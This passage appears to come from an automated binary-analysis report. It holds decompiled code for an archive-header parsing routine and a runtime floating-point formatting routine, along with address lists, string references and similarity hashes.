						_t242 = E0083C43B(_t498);
						__eflags = _t242 | _t498;
						if((_t242 | _t498) == 0) {
							L85:
							E00831FE3(_t394);
							L86:
							E0083158D(_t544 + 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t544 - 0xc));
							return  *(_t544 + 0x60);
						}
						__eflags = _t531;
						if(_t531 == 0) {
							goto L85;
						}
						_t42 = _t531 - 3; // -3
						_t534 = _t531 + 4 + _t242;
						_t409 = _t42 + _t242;
						__eflags = _t409;
						 *(_t544 + 0x64) = _t534;
						if(_t409 < 0) {
							goto L85;
						}
						__eflags = _t534 - 7;
						if(_t534 < 7) {
							goto L85;
						}
						E0083C4CB(_t498, _t409);
						__eflags =  *(_t544 + 0x48) - _t534;
						if(__eflags < 0) {
							goto L17;
						}
						_t248 = E0083C41B(_t544 + 0x30);
						 *(_t394 + 0x21e8) = E0083C43B(_t498);
						_t250 = E0083C43B(_t498);
						 *(_t394 + 0x21ec) = _t250;
						__eflags =  *_t509 - _t248;
						 *(_t394 + 0x21f4) = _t250 >> 0x00000002 & 0x00000001;
						 *(_t394 + 0x21f0) =  *(_t544 + 0x64);
						_t254 =  *(_t394 + 0x21e8);
						 *(_t394 + 0x21dc) = _t254;
						_t255 = _t254 & 0xffffff00 |  *_t509 != _t248;
						 *(_t544 + 0x6b) = _t255;
						__eflags = _t255;
						if(_t255 == 0) {
							L26:
							_t256 = 0;
							__eflags =  *(_t394 + 0x21ec) & 0x00000001;
							 *(_t544 + 0x58) = 0;
							 *(_t544 + 0x54) = 0;
							if(( *(_t394 + 0x21ec) & 0x00000001) == 0) {
								L30:
								__eflags =  *(_t394 + 0x21ec) & 0x00000002;
								_t536 = _t256;
								 *(_t544 + 0x64) = _t256;
								 *(_t544 + 0x5c) = _t256;
								if(( *(_t394 + 0x21ec) & 0x00000002) != 0) {
									_t362 = E0083C43B(_t498);
									_t536 = _t362;
									 *(_t544 + 0x64) = _t362;
									 *(_t544 + 0x5c) = _t498;
								}
								_t257 = E008318D9(_t394,  *(_t394 + 0x21f0));
								_t499 = 0;
								asm("adc eax, edx");
								 *((intOrPtr*)(_t394 + 0x6ca8)) = E00833DB9( *((intOrPtr*)(_t394 + 0x6ca0)) + _t257,  *((intOrPtr*)(_t394 + 0x6ca4)), _t536,  *(_t544 + 0x5c), _t499, _t499);
								 *((intOrPtr*)(_t394 + 0x6cac)) = _t499;
								_t500 =  *(_t394 + 0x21e8);
								__eflags = _t500 - 1;
								if(__eflags == 0) {
									E0083AA10(_t394 + 0x2208);
									_t419 = 5;
									memcpy(_t394 + 0x2208, _t509, _t419 << 2);
									_t501 = E0083C43B(_t500);
									 *(_t394 + 0x6cb5) = _t501 & 1;
									 *(_t394 + 0x6cb4) = _t501 >> 0x00000002 & 1;
									 *(_t394 + 0x6cb7) = _t501 >> 0x00000004 & 1;
									_t431 = 1;
									 *((char*)(_t394 + 0x6cba)) = 1;
									 *(_t394 + 0x6cbb) = _t501 >> 0x00000003 & 1;
									_t270 = 0;
									 *((char*)(_t394 + 0x6cb8)) = 0;
									__eflags = _t501 & 0x00000002;
									if((_t501 & 0x00000002) == 0) {
										 *((intOrPtr*)(_t394 + 0x6cd8)) = 0;
									} else {
										 *((intOrPtr*)(_t394 + 0x6cd8)) = E0083C43B(_t501);
										_t270 = 0;
										_t431 = 1;
									}
									__eflags =  *(_t394 + 0x6cb5);
									if( *(_t394 + 0x6cb5) == 0) {
										L81:
										_t431 = _t270;
										goto L82;
									} else {
										__eflags =  *((intOrPtr*)(_t394 + 0x6cd8)) - _t270;
										if( *((intOrPtr*)(_t394 + 0x6cd8)) == _t270) {
											L82:
											 *((char*)(_t394 + 0x6cb9)) = _t431;
											_t432 =  *(_t544 + 0x58);
											__eflags = _t432 |  *(_t544 + 0x54);
											if((_t432 |  *(_t544 + 0x54)) != 0) {
												E008320F7(_t394, _t544 + 0x30, _t432, _t394 + 0x2208);
											}
											L84:
											 *(_t544 + 0x60) =  *(_t544 + 0x48);
											goto L86;
										}
										goto L81;
									}
								}
								if(__eflags <= 0) {
									goto L84;
								}
								__eflags = _t500 - 3;
								if(_t500 <= 3) {
									__eflags = _t500 - 2;
									_t120 = (0 | _t500 != 0x00000002) - 1; // -1
									_t517 = (_t120 & 0xffffdcb0) + 0x45d0 + _t394;
									 *(_t544 + 0x2c) = _t517;
									E0083A976(_t517, 0);
									_t437 = 5;
									memcpy(_t517, _t394 + 0x21e4, _t437 << 2);
									_t539 =  *(_t544 + 0x2c);
									 *(_t544 + 0x60) =  *(_t394 + 0x21e8);
									 *(_t539 + 0x1058) =  *(_t544 + 0x64);
									 *((char*)(_t539 + 0x10f9)) = 1;
									 *(_t539 + 0x105c) =  *(_t544 + 0x5c);
									 *(_t539 + 0x1094) = E0083C43B(_t500);
									 *(_t539 + 0x1060) = E0083C43B(_t500);
									_t289 =  *(_t539 + 0x1094) >> 0x00000003 & 0x00000001;
									__eflags = _t289;
									 *(_t539 + 0x1064) = _t500;
									 *(_t539 + 0x109a) = _t289;
									if(_t289 != 0) {
										 *(_t539 + 0x1060) = 0x7fffffff;
										 *(_t539 + 0x1064) = 0x7fffffff;
									}
									_t441 =  *(_t539 + 0x105c);
									_t520 =  *(_t539 + 0x1064);
									_t290 =  *(_t539 + 0x1058);
									_t502 =  *(_t539 + 0x1060);
									__eflags = _t441 - _t520;
									if(__eflags < 0) {
										L51:
										_t290 = _t502;
										_t441 = _t520;
										goto L52;
									} else {
										if(__eflags > 0) {
											L52:
											 *(_t539 + 0x106c) = _t441;
											 *(_t539 + 0x1068) = _t290;
											_t291 = E0083C43B(_t502);
											__eflags =  *(_t539 + 0x1094) & 0x00000002;
											 *((intOrPtr*)(_t539 + 0x24)) = _t291;
											if(( *(_t539 + 0x1094) & 0x00000002) != 0) {
												E00840A4D(_t539 + 0x1040, _t502, E0083C33B(_t544 + 0x30), 0);
											}
											 *(_t539 + 0x1070) =  *(_t539 + 0x1070) & 0x00000000;
											__eflags =  *(_t539 + 0x1094) & 0x00000004;
											if(( *(_t539 + 0x1094) & 0x00000004) != 0) {
												 *(_t539 + 0x1070) = 2;
												 *((intOrPtr*)(_t539 + 0x1074)) = E0083C33B(_t544 + 0x30);
											}
											 *(_t539 + 0x1100) =  *(_t539 + 0x1100) & 0x00000000;
											_t292 = E0083C43B(_t502);
											 *(_t544 + 0x64) = _t292;
											 *(_t539 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
											_t449 = (_t292 & 0x0000003f) + 0x32;
											 *((intOrPtr*)(_t539 + 0x1c)) = _t449;
											__eflags = _t449 - 0x32;
											if(_t449 != 0x32) {
												 *((intOrPtr*)(_t539 + 0x1c)) = 0x270f;
											}
											 *((char*)(_t539 + 0x18)) = E0083C43B(_t502);
											_t521 = E0083C43B(_t502);
											 *(_t539 + 0x10fc) = 2;
											_t295 =  *((intOrPtr*)(_t539 + 0x18));
											 *(_t539 + 0x10f8) =  *(_t394 + 0x21ec) >> 0x00000006 & 1;
											__eflags = _t295 - 1;
											if(_t295 != 1) {
												__eflags = _t295;
												if(_t295 == 0) {
													_t177 = _t539 + 0x10fc;
													 *_t177 =  *(_t539 + 0x10fc) & 0x00000000;
													__eflags =  *_t177;
												}
											} else {
												 *(_t539 + 0x10fc) = 1;
											}
											_t455 =  *(_t539 + 8);
											 *(_t539 + 0x1098) = _t455 >> 0x00000003 & 1;
											 *(_t539 + 0x10fa) = _t455 >> 0x00000005 & 1;
											__eflags =  *(_t544 + 0x60) - 2;
											_t458 =  *(_t544 + 0x64);
											 *(_t539 + 0x1099) = _t455 >> 0x00000004 & 1;
											if( *(_t544 + 0x60) != 2) {
												L65:
												_t302 = 0;
												__eflags = 0;
												goto L66;
											} else {
												__eflags = _t458 & 0x00000040;
												if((_t458 & 0x00000040) == 0) {
													goto L65;
												}
												_t302 = 1;
												L66:
												 *((char*)(_t539 + 0x10f0)) = _t302;
												_t304 =  *(_t539 + 0x1094) & 1;
												 *(_t539 + 0x10f1) = _t304;
												asm("sbb eax, eax");
												 *(_t539 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t458 >> 0x0000000a & 0x0000000f);
												asm("sbb eax, eax");
												 *(_t539 + 0x109c) =  ~( *(_t539 + 0x109b) & 0x000000ff) & 0x00000005;
												__eflags = _t521 - 0x1fff;
												if(_t521 >= 0x1fff) {
													_t521 = 0x1fff;
												}
												E0083C39D(_t544 + 0x30, _t544 - 0x2074, _t521);
												 *((char*)(_t544 + _t521 - 0x2074)) = 0;
												_push(0x800);
												_t522 = _t539 + 0x28;
												_push(_t539 + 0x28);
												_push(_t544 - 0x2074);
												E008410BC();
												_t462 =  *(_t544 + 0x58);
												__eflags = _t462 |  *(_t544 + 0x54);
												if((_t462 |  *(_t544 + 0x54)) != 0) {
													E008320F7(_t394, _t544 + 0x30, _t462, _t539);
												}
												_t319 =  *(_t544 + 0x60);
												__eflags =  *(_t544 + 0x60) - 2;
												if( *(_t544 + 0x60) != 2) {
													L72:
													_t320 = E00852BC9(_t319, _t522, L"CMT");
													__eflags = _t320;
													if(_t320 == 0) {
														 *((char*)(_t394 + 0x6cb6)) = 1;
													}
													goto L74;
												} else {
													E00832028(_t394, _t539);
													_t319 =  *(_t544 + 0x60);
													__eflags =  *(_t544 + 0x60) - 2;
													if( *(_t544 + 0x60) == 2) {
														L74:
														__eflags =  *(_t544 + 0x6b);
														if(__eflags != 0) {
															E00831F29(__eflags, 0x1c, _t394 + 0x1e, _t522);
														}
														goto L84;
													}
													goto L72;
												}
											}
										}
										__eflags = _t290 - _t502;
										if(_t290 > _t502) {
											goto L52;
										}
										goto L51;
									}
								}
								__eflags = _t500 - 4;
								if(_t500 == 4) {
									_t470 = 5;
									memcpy(_t394 + 0x2248, _t394 + 0x21e4, _t470 << 2);
									_t331 = E0083C43B(_t500);
									__eflags = _t331;
									if(_t331 == 0) {
										 *(_t394 + 0x225c) = E0083C43B(_t500) & 0x00000001;
										_t335 = E0083C2EE(_t544 + 0x30) & 0x000000ff;
										 *(_t394 + 0x2260) = _t335;
										__eflags = _t335 - 0x18;
										if(_t335 <= 0x18) {
											E0083C39D(_t544 + 0x30, _t394 + 0x2264, 0x10);
											__eflags =  *(_t394 + 0x225c);
											if( *(_t394 + 0x225c) != 0) {
												E0083C39D(_t544 + 0x30, _t394 + 0x2274, 8);
												E0083C39D(_t544 + 0x30, _t544 + 0x64, 4);
												E0083F55A(_t544 - 0x74);
												E0083F5A0(_t544 - 0x74, _t394 + 0x2274, 8);
												_push(_t544 + 8);
												E0083F46B(_t544 - 0x74);
												_t350 = E0084F3CA(_t544 + 0x64, _t544 + 8, 4);
												asm("sbb al, al");
												_t352 =  ~_t350 + 1;
												__eflags = _t352;
												 *(_t394 + 0x225c) = _t352;
											}
											 *((char*)(_t394 + 0x6cbc)) = 1;
											goto L84;
										}
										_push(_t335);
										_push(L"hc%u");
										L40:
										_push(0x14);
										_push(_t544);
										E00833F53();
										E00833EFE(_t394, _t394 + 0x1e, _t544);
										goto L86;
									}
									_push(_t331);
									_push(L"h%u");
									goto L40;
								}
								__eflags = _t500 - 5;
								if(_t500 == 5) {
									_t479 = _t500;
									memcpy(_t394 + 0x4590, _t394 + 0x21e4, _t479 << 2);
									 *(_t394 + 0x45ac) = E0083C43B(_t500) & 0x00000001;
									 *((short*)(_t394 + 0x45ae)) = 0;
									 *((char*)(_t394 + 0x45ad)) = 0;
								}
								goto L84;
							}
							_t484 = E0083C43B(_t498);
							 *(_t544 + 0x54) = _t498;
							_t256 = 0;
							 *(_t544 + 0x58) = _t484;
							__eflags = _t498;
							if(__eflags < 0) {
								goto L30;
							}
							if(__eflags > 0) {
								goto L85;
							}
							__eflags = _t484 -  *(_t394 + 0x21f0);
							if(_t484 >=  *(_t394 + 0x21f0)) {
								goto L85;
							}
							goto L30;
						}
						E00831FE3(_t394);
						 *((char*)(_t394 + 0x6cc4)) = 1;
						E00836F18(0x8700e0, 3);
						__eflags =  *((char*)(_t544 + 0x6a));
						if(__eflags == 0) {
							goto L26;
						} else {
							E00831F29(__eflags, 4, _t394 + 0x1e, _t394 + 0x1e);
							 *((char*)(_t394 + 0x6cc5)) = 1;
							goto L86;
						}
					}
					L17:
					E00833EBD(_t394, _t498, _t565);
					goto L86;
				}
				_t498 =  *((intOrPtr*)(__ecx + 0x6cc0)) + 8;
				asm("adc eax, ecx");
				_t556 =  *((intOrPtr*)(__ecx + 0x6ca4));
				if(_t556 < 0 || _t556 <= 0 &&  *((intOrPtr*)(__ecx + 0x6ca0)) <= _t498) {
					goto L15;
				} else {
					_push(0x10);
					_push(_t544 + 0x18);
					 *((char*)(_t544 + 0x6a)) = 1;
					if( *((intOrPtr*)( *_t394 + 0xc))() != 0x10) {
						goto L17;
					}
					if( *((char*)( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5124)) != 0) {
						L7:
						 *(_t544 + 0x6b) = 1;
						L8:
						E00833D52(_t394);
						_t529 = _t394 + 0x2264;
						_t543 = _t394 + 0x1024;
						E008361AA(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t394 + 0x2264, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
						if( *(_t394 + 0x225c) == 0) {
							L13:
							 *((intOrPtr*)(_t544 + 0x50)) = _t543;
							goto L16;
						} else {
							_t378 = _t394 + 0x2274;
							while(1) {
								_t380 = E0084F3CA(_t544 + 0x28, _t378, 8);
								_t546 = _t546 + 0xc;
								if(_t380 == 0) {
									goto L13;
								}
								_t563 =  *(_t544 + 0x6b);
								_t381 = _t394 + 0x1e;
								_push(_t381);
								_push(_t381);
								if( *(_t544 + 0x6b) != 0) {
									_push(6);
									E00831F29(__eflags);
									 *((char*)(_t394 + 0x6cc5)) = 1;
									E00836F18(0x8700e0, 0xb);
									goto L86;
								}
								_push(0x7c);
								E00831F29(_t563);
								E0083E7CD( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024);
								E00833D52(_t394);
								E008361AA(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t529, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
								_t378 = _t394 + 0x2274;
								if( *(_t394 + 0x225c) != 0) {
									continue;
								}
								goto L13;
							}
							goto L13;
						}
					}
					_t392 = E00840FE2();
					 *(_t544 + 0x6b) = 0;
					if(_t392 == 0) {
						goto L8;
					}
					goto L7;
				}
			}

0x0083320f
0x00833217
0x00833221
0x00833228
0x0083322f
0x00833236
0x00833239
0x00833242
0x0083338b
0x0083338b
0x0083338e
0x00833393
0x00833398
0x0083339b
0x008333ac
0x008333b3
0x008333c3
0x008333cd
0x008333cf
0x008333d6
0x008333d8
0x00833a08
0x00833a0a
0x00833a0f
0x00833a12
0x00833a20
0x00833a2b
0x00833a2b
0x008333de
0x008333e0
0x00000000
0x00000000
0x008333e6
0x008333ec
0x008333ee
0x008333ee
0x008333f0
0x008333f3
0x00000000
0x00000000
0x008333f9
0x008333fc
0x00000000
0x00000000
0x00833406
0x0083340b
0x0083340e
0x00000000
0x00000000
0x00833413
0x00833425
0x0083342b
0x00833430
0x0083343b
0x0083343d
0x00833446
0x0083344c
0x00833452
0x00833458
0x0083345b
0x0083345e
0x00833460
0x0083349a
0x0083349a
0x0083349c
0x008334a3
0x008334a6
0x008334a9
0x008334d3
0x008334d3
0x008334da
0x008334dc
0x008334df
0x008334e2
0x008334e7
0x008334ec
0x008334ee
0x008334f1
0x008334f1
0x008334fc
0x00833509
0x00833518
0x00833521
0x00833529
0x00833530
0x00833536
0x00833538
0x00833949
0x00833958
0x00833959
0x00833963
0x0083396c
0x00833979
0x00833988
0x00833993
0x00833996
0x0083399c
0x008339a2
0x008339a4
0x008339aa
0x008339ad
0x008339c4
0x008339af
0x008339b7
0x008339bf
0x008339c1
0x008339c1
0x008339ca
0x008339d1
0x008339db
0x008339db
0x00000000
0x008339d3
0x008339d3
0x008339d9
0x008339dd
0x008339dd
0x008339e3
0x008339e8
0x008339eb
0x008339fb
0x008339fb
0x00833a00
0x00833a03
0x00000000
0x00833a03
0x00000000
0x008339d9
0x008339d1
0x0083353e
0x00000000
0x00000000
0x00833544
0x00833547
0x00833689
0x00833691
0x008336a0
0x008336a4
0x008336a7
0x008336ae
0x008336b5
0x008336c0
0x008336c3
0x008336c9
0x008336d2
0x008336d9
0x008336e7
0x008336f2
0x00833701
0x00833701
0x00833703
0x00833709
0x0083370f
0x00833716
0x0083371c
0x0083371c
0x00833722
0x00833728
0x0083372e
0x00833734
0x0083373a
0x0083373c
0x00833744
0x00833744
0x00833746
0x00000000
0x0083373e
0x0083373e
0x00833748
0x00833748
0x00833751
0x00833757
0x0083375c
0x00833763
0x00833766
0x00833779
0x00833779
0x0083377e
0x00833785
0x0083378c
0x00833791
0x008337a0
0x008337a0
0x008337a6
0x008337b0
0x008337b7
0x008337c0
0x008337c8
0x008337cb
0x008337ce
0x008337d1
0x008337d3
0x008337d3
0x008337e5
0x008337f9
0x008337fb
0x00833805
0x0083380a
0x00833810
0x00833812
0x0083381c
0x0083381e
0x00833820
0x00833820
0x00833820
0x00833820
0x00833814
0x00833814
0x00833814
0x00833827
0x00833831
0x00833843
0x00833849
0x0083384d
0x00833850
0x00833856
0x00833861
0x00833861
0x00833861
0x00000000
0x00833858
0x00833858
0x0083385b
0x00000000
0x00000000
0x0083385d
0x00833863
0x00833863
0x0083386f
0x00833874
0x00833889
0x0083388f
0x0083389e
0x008338a3
0x008338ae
0x008338b0
0x008338b2
0x008338b2
0x008338bf
0x008338c4
0x008338d2
0x008338d7
0x008338da
0x008338db
0x008338dc
0x008338e1
0x008338e6
0x008338e9
0x008338f3
0x008338f3
0x008338f8
0x008338fb
0x008338fe
0x00833910
0x00833916
0x0083391d
0x0083391f
0x00833921
0x00833921
0x00000000
0x00833900
0x00833903
0x00833908
0x0083390b
0x0083390e
0x00833928
0x00833928
0x0083392c
0x00833939
0x00833939
0x00000000
0x0083392c
0x00000000
0x0083390e
0x008338fe
0x00833856
0x00833740
0x00833742
0x00000000
0x00000000
0x00000000
0x00833742
0x0083373c
0x0083354d
0x00833550
0x00833591
0x0083359e
0x008335a3
0x008335a8
0x008335aa
0x008335e1
0x008335ec
0x008335ef
0x008335f5
0x008335f8
0x0083360e
0x00833613
0x0083361a
0x00833628
0x00833636
0x0083363f
0x0083364b
0x00833653
0x00833658
0x00833667
0x00833671
0x00833673
0x00833673
0x00833675
0x00833675
0x0083367b
0x00000000
0x0083367b
0x008335fa
0x008335fb
0x008335b2
0x008335b5
0x008335b7
0x008335b8
0x008335ca
0x00000000
0x008335ca
0x008335ac
0x008335ad
0x00000000
0x008335ad
0x00833552
0x00833555
0x0083355c
0x00833569
0x00833575
0x0083357d
0x00833584
0x00833584
0x00000000
0x00833555
0x008334b3
0x008334b5
0x008334b8
0x008334ba
0x008334bd
0x008334bf
0x00000000
0x00000000
0x008334c1
0x00000000
0x00000000
0x008334c7
0x008334cd
0x00000000
0x00000000
0x00000000
0x008334cd
0x00833464
0x00833470
0x00833477
0x0083347c
0x00833480
0x00000000
0x00833482
0x00833489
0x0083348e
0x00000000
0x0083348e
0x00833480
0x0083339d
0x0083339f
0x00000000
0x0083339f
0x00833250
0x00833253
0x00833255
0x0083325b
0x00000000
0x0083326f
0x00833274
0x00833276
0x00833279
0x00833283
0x00000000
0x00000000
0x00833296
0x008332a5
0x008332a5
0x008332a9
0x008332ab
0x008332c7
0x008332d3
0x008332df
0x008332eb
0x00833367
0x00833367
0x00000000
0x008332ed
0x008332ed
0x008332f3
0x008332fa
0x008332ff
0x00833304
0x00000000
0x00000000
0x00833306
0x0083330a
0x0083330d
0x0083330e
0x0083330f
0x0083336c
0x0083336e
0x0083337a
0x00833381
0x00000000
0x00833381
0x00833311
0x00833313
0x00833324
0x0083332b
0x00833353
0x0083335f
0x00833365
0x00000000
0x00000000
0x00000000
0x00833365
0x00000000
0x008332f3
0x008332eb
0x00833298
0x0083329d
0x008332a3
0x00000000
0x00000000
0x00000000
0x008332a3

APIs

__EH_prolog.LIBCMT ref: 00833217
_memcmp.LIBVCRUNTIME ref: 008332FA

Strings

hc%u, xrefs: 008335FB
h%u, xrefs: 008335AD
CMT, xrefs: 00833910

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog_memcmp
String ID: CMT$h%u$hc%u
API String ID: 3004599000-3282847064
Opcode ID: 11fcd5cf15e8b68072b78b2c36005e32669a56142a337ad06dfad2538d28cc67
Instruction ID: 2452ee0af4387f3081072623d9a54e5ab3dfccfb9bb00c2f2fd4f6d81f43130d
Opcode Fuzzy Hash: 11fcd5cf15e8b68072b78b2c36005e32669a56142a337ad06dfad2538d28cc67
Instruction Fuzzy Hash: F032C1715006889FDF14DF68C895AEA3BA5FF94300F04447DFD8ADB282DB749A49CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0085C5AE, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E0085C5AE(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v32;
				signed int _v36;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _t743;
				signed int _t753;
				signed int _t754;
				intOrPtr _t763;
				signed int _t764;
				intOrPtr _t767;
				intOrPtr _t770;
				intOrPtr _t772;
				intOrPtr _t773;
				void* _t774;
				signed int _t778;
				signed int _t779;
				signed int _t785;
				signed int _t791;
				intOrPtr _t793;
				void* _t794;
				signed int _t795;
				signed int _t796;
				signed int _t797;
				signed int _t806;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				signed int _t816;
				signed int _t817;
				signed int _t818;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t828;
				signed int _t829;
				signed int _t835;
				signed int _t836;
				signed int _t839;
				signed int _t844;
				signed int _t852;
				signed int* _t855;
				signed int _t859;
				signed int _t870;
				signed int _t871;
				signed int _t873;
				char* _t874;
				signed int _t877;
				signed int _t881;
				signed int _t882;
				signed int _t887;
				signed int _t889;
				signed int _t894;
				signed int _t903;
				signed int _t906;
				signed int _t908;
				signed int _t911;
				signed int _t912;
				signed int _t913;
				signed int _t916;
				signed int _t929;
				signed int _t930;
				signed int _t932;
				char* _t933;
				signed int _t936;
				signed int _t940;
				signed int _t941;
				signed int* _t943;
				signed int _t946;
				signed int _t948;
				signed int _t953;
				signed int _t961;
				signed int _t964;
				signed int _t968;
				signed int* _t975;
				intOrPtr _t977;
				void* _t978;
				intOrPtr* _t980;
				signed int* _t984;
				unsigned int _t995;
				signed int _t996;
				void* _t999;
				signed int _t1000;
				void* _t1002;
				signed int _t1003;
				signed int _t1004;
				signed int _t1005;
				signed int _t1015;
				signed int _t1020;
				signed int _t1023;
				unsigned int _t1026;
				signed int _t1027;
				void* _t1030;
				signed int _t1031;
				void* _t1033;
				signed int _t1034;
				signed int _t1035;
				signed int _t1036;
				signed int _t1041;
				signed int* _t1046;
				signed int _t1048;
				signed int _t1058;
				void _t1061;
				signed int _t1064;
				void* _t1067;
				void* _t1074;
				signed int _t1080;
				signed int _t1081;
				signed int _t1084;
				signed int _t1085;
				signed int _t1087;
				signed int _t1088;
				signed int _t1089;
				signed int _t1093;
				signed int _t1097;
				signed int _t1098;
				signed int _t1099;
				signed int _t1101;
				signed int _t1102;
				signed int _t1103;
				signed int _t1104;
				signed int _t1105;
				signed int _t1106;
				signed int _t1108;
				signed int _t1109;
				signed int _t1110;
				signed int _t1111;
				signed int _t1112;
				signed int _t1113;
				unsigned int _t1114;
				void* _t1117;
				intOrPtr _t1119;
				signed int _t1120;
				signed int _t1121;
				signed int _t1122;
				signed int* _t1126;
				void* _t1130;
				void* _t1131;
				signed int _t1132;
				signed int _t1133;
				signed int _t1134;
				signed int _t1137;
				signed int _t1138;
				signed int _t1143;
				void* _t1145;
				signed int _t1146;
				signed int _t1149;
				char _t1154;
				signed int _t1156;
				signed int _t1157;
				signed int _t1158;
				signed int _t1159;
				signed int _t1160;
				signed int _t1161;
				signed int _t1162;
				signed int _t1166;
				signed int _t1167;
				signed int _t1168;
				signed int _t1169;
				signed int _t1170;
				unsigned int _t1173;
				void* _t1177;
				void* _t1178;
				unsigned int _t1179;
				signed int _t1184;
				signed int _t1185;
				signed int _t1187;
				signed int _t1188;
				intOrPtr* _t1190;
				signed int _t1191;
				signed int _t1193;
				signed int _t1194;
				signed int _t1197;
				signed int _t1199;
				signed int _t1200;
				void* _t1201;
				signed int _t1202;
				signed int _t1203;
				signed int _t1204;
				void* _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int* _t1215;
				signed int _t1216;
				signed int _t1217;
				signed int _t1218;
				signed int _t1219;
				intOrPtr* _t1221;
				intOrPtr* _t1222;
				signed int _t1224;
				signed int _t1226;
				signed int _t1229;
				signed int _t1235;
				signed int _t1239;
				signed int _t1240;
				signed int _t1245;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int _t1251;
				signed int _t1252;
				signed int _t1253;
				signed int _t1255;
				signed int _t1256;
				signed int _t1257;
				signed int _t1258;
				signed int _t1260;
				signed int _t1261;
				signed int _t1262;
				signed int _t1263;
				signed int _t1264;
				signed int _t1266;
				signed int _t1267;
				signed int _t1269;
				signed int _t1271;
				signed int _t1273;
				signed int _t1276;
				signed int _t1278;
				signed int* _t1279;
				signed int* _t1282;
				signed int _t1291;

				_t1145 = __edx;
				_t1276 = _t1278;
				_t1279 = _t1278 - 0x964;
				_t743 =  *0x86d668; // 0x14325215
				_v8 = _t743 ^ _t1276;
				_t1058 = _a20;
				_push(__esi);
				_push(__edi);
				_t1190 = _a16;
				_v1924 = _t1190;
				_v1920 = _t1058;
				E0085C0D3( &_v1944, __eflags);
				_t1239 = _a8;
				_t748 = 0x2d;
				if((_t1239 & 0x80000000) == 0) {
					_t748 = 0x120;
				}
				 *_t1190 = _t748;
				 *((intOrPtr*)(_t1190 + 8)) = _t1058;
				_t1191 = _a4;
				if((_t1239 & 0x7ff00000) != 0) {
					L5:
					_t753 = E0085871A( &_a4);
					_pop(_t1073);
					__eflags = _t753;
					if(_t753 != 0) {
						_t1073 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t754 = _t753 - 1;
					__eflags = _t754;
					if(_t754 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t778 = _t754 - 1;
						__eflags = _t778;
						if(_t778 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t779 = _t778 - 1;
							__eflags = _t779;
							if(_t779 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t779 == 1;
								if(_t779 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1191;
									_a8 = _t1239 & 0x7fffffff;
									_t1291 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1193 = _v1896;
									_v1916 = _a12 + 1;
									_t1080 = _t1193 >> 0x14;
									_t785 = _t1080 & 0x000007ff;
									__eflags = _t785;
									if(_t785 != 0) {
										_t1146 = 0;
										_t785 = 0;
										__eflags = 0;
									} else {
										_t1146 = 1;
									}
									_t1194 = _t1193 & 0x000fffff;
									_t1061 = _v1900 + _t785;
									asm("adc edi, esi");
									__eflags = _t1146;
									_t1081 = _t1080 & 0x000007ff;
									_t1245 = _t1081 - 0x434 + (0 | _t1146 != 0x00000000) + 1;
									_v1872 = _t1245;
									E0085E110(_t1081, _t1291);
									_push(_t1081);
									_push(_t1081);
									 *_t1279 = _t1291;
									_t791 = E00860F60(E0085E220(_t1194, _t1245), _t1291);
									_v1904 = _t791;
									__eflags = _t791 - 0x7fffffff;
									if(_t791 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t791 - 0x80000000;
										if(_t791 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1061;
									__eflags = _t1194;
									_v464 = _t1194;
									_t1064 = (0 | _t1194 != 0x00000000) + 1;
									_v472 = _t1064;
									__eflags = _t1245;
									if(_t1245 < 0) {
										__eflags = _t1245 - 0xfffffc02;
										if(_t1245 == 0xfffffc02) {
											L101:
											_t793 =  *((intOrPtr*)(_t1276 + _t1064 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1084 = 0;
